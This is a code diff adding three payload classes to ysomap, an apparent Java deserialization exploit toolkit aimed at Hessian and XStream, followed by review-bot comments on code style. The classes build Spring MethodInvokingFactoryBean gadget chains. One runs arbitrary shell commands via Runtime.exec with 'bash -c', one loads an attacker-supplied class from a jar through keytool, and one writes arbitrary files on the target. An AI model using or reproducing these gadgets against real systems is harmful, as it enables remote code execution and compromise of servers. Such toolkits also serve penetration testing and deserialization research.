Showing
8 changed files
with
219 additions
and
26 deletions.
53 changes: 53 additions & 0 deletions
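--- a/core/src/main/java/ysomap/bullets/spring/SpringExecBullet.java
+++ b/core/src/main/java/ysomap/bullets/spring/SpringExecBullet.java
@@ -0,0 +1,53 @@
+package ysomap.bullets.spring;
+
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+import org.springframework.beans.factory.support.StaticListableBeanFactory;
+import ysomap.bullets.AbstractBullet;
+import ysomap.common.annotation.*;
+import ysomap.core.util.DetailHelper;
+import ysomap.core.util.ReflectionHelper;
+
+import java.lang.reflect.Method;
+
+/**
+* @author wh1t3p1g
+* @since 2022/5/16
+*/
+@Bullets
+@Authors({Authors.WH1T3P1G})
+@Details("任意函数调用")
+@Targets({Targets.HESSIAN, Targets.XSTREAM})
+@Dependencies({"org.springframework:spring-context"})
+public class SpringExecBullet extends AbstractBullet<Object> {
+
+@NotNull
+@Require(name = "command", detail = DetailHelper.COMMAND)
+public String command;
+
+private String beanName = "ysomap";
+
+@Override
+public Object getObject() throws Exception {
+StaticListableBeanFactory beanFactory = new StaticListableBeanFactory();
+beanFactory.addBean(beanName, makeBean());
+return beanFactory;
+}
+
+public Object makeBean() throws Exception {
+MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean();
+bean.setSingleton(false);
+bean.setTargetObject(Runtime.getRuntime());
+Class cls = Runtime.class;
+Method method = cls.getMethod("exec", String[].class);
+ReflectionHelper.setFieldValue(bean, "methodObject", method);
+ReflectionHelper.setFieldValue(bean, "beanClassLoader", null);
+bean.setArguments(new Object[]{new String[]{"bash", "-c", command}});
+return bean;
+}
+
+public static SpringExecBullet newInstance(Object... args) throws Exception {
+SpringExecBullet bullet = new SpringExecBullet();
+bullet.set("command", args[0]);
+return bullet;
+}
+}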
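Review bot: The class Javadoc on SpringExecBullet carries only `@author`/`@since`, and `@Details("任意函数调用")` says only "arbitrary method call", so nothing states what `getObject()` actually returns. A one-line summary such as `Builds a StaticListableBeanFactory holding a non-singleton MethodInvokingFactoryBean whose methodObject is set by reflection to Runtime.exec(String[]).` would document it, and it names the two Spring classes that someone writing a deserialization allow-list or detection rule needs to recognise. In `makeBean()`, `Class cls = Runtime.class;` is a raw type; `Class<?> cls` matches what SpringUploadBullet already uses. `newInstance` reads `args[0]` without a length check, so an empty call fails with ArrayIndexOutOfBoundsException rather than a message naming the missing `command`.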
54 changes: 54 additions & 0 deletions
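--- a/core/src/main/java/ysomap/bullets/spring/SpringLoadJarBullet.java
+++ b/core/src/main/java/ysomap/bullets/spring/SpringLoadJarBullet.java
@@ -0,0 +1,54 @@
+package ysomap.bullets.spring;
+
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+import ysomap.common.annotation.*;
+import ysomap.core.util.ReflectionHelper;
+
+import java.lang.reflect.Method;
+
+/**
+* @author wh1t3p1g
+* @since 2022/5/16
+*/
+@Bullets
+@Authors({Authors.WH1T3P1G})
+@Details("任意函数调用")
+@Targets({Targets.HESSIAN, Targets.XSTREAM})
+@Dependencies({"org.springframework:spring-context"})
+public class SpringLoadJarBullet extends SpringExecBullet {
+
+@NotNull
+@Require(name = "filepath", detail = "上传至目标环境的jar路径")
+public String filepath;
+
+@NotNull
+@Require(name = "evilClass", detail = "需要初始化的对象,默认调用无参构造函数")
+public String evilClass;
+
+private String beanName = "ysomap";
+
+public Object makeBean() throws Exception {
+MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean();
+bean.setSingleton(false);
+bean.setTargetObject(Runtime.getRuntime());
+Class cls = sun.security.tools.keytool.Main.class;
+Method method = cls.getMethod("main", String[].class);
+ReflectionHelper.setFieldValue(bean, "methodObject", method);
+ReflectionHelper.setFieldValue(bean, "beanClassLoader", null);
+Object[] evilargs = new Object[]{new String[]{
+"-LIST", "-provider:",
+evilClass,
+"-keystore", "NONE", "-protected", "-debug", "-providerpath",
+filepath
+}};
+bean.setArguments(evilargs);
+return bean;
+}
+
+public static SpringLoadJarBullet newInstance(Object... args) throws Exception {
+SpringLoadJarBullet bullet = new SpringLoadJarBullet();
+bullet.set("filepath", args[0]);
+bullet.set("evilClass", args[1]);
+return bullet;
+}
+}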
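Review bot: `private String beanName = "ysomap";` is redeclared here although this class never reads it; the inherited `getObject()` uses the private field in SpringExecBullet, so the copy is dead and can be dropped (the same line appears in SpringUploadBullet). `makeBean()` replaces the parent's method without `@Override` in both subclasses, so a later signature change in SpringExecBullet would silently stop the override from applying; add `@Override`. Extending SpringExecBullet also inherits its `@NotNull @Require` `command` field, which neither subclass's `newInstance` sets; whether validation rejects that depends on framework code not shown here. All three classes carry the identical `@Details("任意函数调用")`, so a listing built from that annotation cannot tell them apart.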
54 changes: 54 additions & 0 deletions
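--- a/core/src/main/java/ysomap/bullets/spring/SpringUploadBullet.java
+++ b/core/src/main/java/ysomap/bullets/spring/SpringUploadBullet.java
@@ -0,0 +1,54 @@
+package ysomap.bullets.spring;
+
+import com.sun.org.apache.xml.internal.security.utils.JavaUtils;
+import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
+import ysomap.common.annotation.*;
+import ysomap.core.util.FileHelper;
+import ysomap.core.util.ReflectionHelper;
+
+import java.lang.reflect.Method;
+
+/**
+* @author wh1t3p1g
+* @since 2022/5/16
+*/
+@Bullets
+@Authors({Authors.WH1T3P1G})
+@Details("任意函数调用")
+@Targets({Targets.HESSIAN, Targets.XSTREAM})
+@Dependencies({"org.springframework:spring-context"})
+public class SpringUploadBullet extends SpringExecBullet {
+
+@NotNull
+@Require(name = "filepath", detail = "/tmp/test")
+public String filepath;
+
+@NotNull
+@Require(name = "localFile", detail = "/tmp/test")
+public String localFile;
+
+private String beanName = "ysomap";
+private byte[] data = null;
+
+public Object makeBean() throws Exception {
+if(data == null){
+data = FileHelper.getFileContent(localFile);
+}
+MethodInvokingFactoryBean bean = new MethodInvokingFactoryBean();
+bean.setSingleton(false);
+Class<?> cls = JavaUtils.class;
+bean.setTargetObject(cls);
+Method method = cls.getMethod("writeBytesToFilename", String.class, byte[].class);
+ReflectionHelper.setFieldValue(bean, "methodObject", method);
+ReflectionHelper.setFieldValue(bean, "beanClassLoader", null);
+bean.setArguments(filepath, data);
+return bean;
+}
+
+public static SpringUploadBullet newInstance(Object... args) throws Exception {
+SpringUploadBullet bullet = new SpringUploadBullet();
+bullet.set("filepath", args[0]);
+bullet.set("localFile", args[1]);
+return bullet;
+}
+}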
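Review bot: Both `@Require` annotations use `detail = "/tmp/test"`, a sample path rather than a description, so the parameter help cannot say which of `filepath` and `localFile` is read and which is written; from `makeBean()`, `localFile` is read with `FileHelper.getFileContent` and `filepath` is the first argument to `writeBytesToFilename`. Each `detail` should describe its parameter, as the ones in SpringLoadJarBullet do. `data` is cached after the first `makeBean()` call, so a later change to `localFile` on the same instance is ignored; either drop the cache or mark it with a comment such as `// read once; later changes to localFile are not picked up`. The import of `com.sun.org.apache.xml.internal.security.utils.JavaUtils` ties the class to a JDK-internal package that `@Dependencies` does not mention, which is worth recording in the class Javadoc.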
16 changes: 13 additions & 3 deletions
core/src/main/java/ysomap/core/serializer/hessian/NoWriteReplaceSerializerFactory.java